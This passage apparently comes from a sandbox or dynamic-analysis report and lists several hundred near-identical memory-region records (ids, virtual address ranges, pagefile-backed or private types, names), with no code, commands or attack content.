filename = "" Region: id = 5850 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5851 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5852 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5853 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5854 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5855 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5856 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5857 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5858 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5859 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5860 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5861 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5862 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000001d0000" filename = "" Region: id = 5863 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5864 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5865 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5866 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5867 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5868 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5869 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5870 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5871 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5872 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5873 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5874 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5881 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5882 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5883 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5884 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5885 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5886 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5887 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5888 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5889 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5890 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5891 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 5892 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 5893 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 5894 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5895 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5896 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5897 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5898 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5899 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5900 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5901 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5902 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5903 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5904 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5905 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5906 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5907 start_va = 0x1d0000 end_va = 0x1e0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5908 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5909 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5910 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5911 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5912 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5913 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5914 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5915 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5916 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5917 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5918 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5919 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5920 start_va = 0x1d0000 
end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5921 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5922 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5923 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5924 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5925 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5926 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5927 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5928 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5929 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5930 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5931 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5932 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5933 
start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5934 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5935 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5936 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5937 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5938 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5939 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5940 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5941 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 5942 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6058 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6059 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 6060 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: 
id = 6061 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6062 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6063 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6064 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6065 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6066 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6067 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6068 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6069 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6070 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6071 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6072 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6073 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" 
filename = "" Region: id = 6074 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6075 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6076 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6077 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6078 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6079 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6080 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6081 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6082 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6083 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6084 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6085 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6086 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000001d0000" filename = "" Region: id = 6087 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6088 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6089 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6090 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6091 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6092 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6093 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6094 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6095 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6096 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6097 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6098 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6099 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6100 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6101 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6102 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6103 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6104 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6105 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6106 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6107 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6108 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6109 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6110 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6111 start_va = 0x1750000 end_va = 0x1b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001750000" filename = "" Region: id = 6112 start_va = 0x1b60000 end_va = 0x1f6ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000001b60000" filename = "" Region: id = 6113 start_va = 0x1e0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6114 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6115 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6116 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6117 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6118 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6119 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6120 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6121 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6122 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6123 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6124 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6125 start_va = 0x1d0000 end_va = 0x1e0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6126 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6127 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6128 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6129 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6130 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6131 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6132 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6133 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6134 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6135 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6136 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6137 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6138 start_va = 0x1d0000 
end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6139 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6140 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6141 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6142 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6143 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6144 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6145 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6146 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6147 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6148 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6149 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6150 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6151 
start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6152 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6153 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6154 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6155 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6156 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6157 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6158 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6159 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6160 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6161 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6162 start_va = 0x1d0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6269 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id 
